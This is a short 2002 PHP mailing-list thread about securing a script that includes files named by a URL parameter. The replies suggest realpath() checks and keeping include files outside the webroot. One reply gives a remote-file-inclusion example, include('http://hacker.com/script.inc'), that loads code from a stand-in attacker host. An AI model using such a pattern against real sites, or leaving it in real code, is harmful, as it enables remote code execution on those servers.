ah never thought of that!
John
On Friday 04 Oct 2002 11:14 am, Stas Maximov wrote:
> The easiest and safest way to get around this problem is to place all your
> include files outside of your webroot directory (say one level up), so they
> will be accessible locally via includes, but NOT accessible via http.
>
> HTH, Stas
>
> ----- Original Message -----
> From: "John Wards" <[EMAIL PROTECTED]>
> To: "PHP" <[EMAIL PROTECTED]>
> Sent: Friday, October 04, 2002 10:58 AM
> Subject: Re: [PHP] Umm... Uh-oh
>
>
> erm......would that alow hackers access? Say I have a database include file
> would hackers be able to get access to my database like this?
>
> (include('http://mysite.com/datainc.php');)
>
> I hope bloody not!!! if so how on earth do i get round that!
>
> John
>
> On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote:
> > Use realpath() to check the path. I also suspect your script is
> > vulnarable to cross-site includes
> > (include('http://hacker.com/script.inc');)
> >
> > Rick Beckman wrote:
> > >Okay, I was mistaken... There is a gaping security hole in my simple
> > > li'l script... How do I modify it to only accept files from a certain
> > > path? I want the url format to be script.php?call=1 where "1" is the
> > > called file in the /includes/ directory. Just when I get optimistic I
> > > leave the entire system exposed. Yeah, that fits with my luck. :-)
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
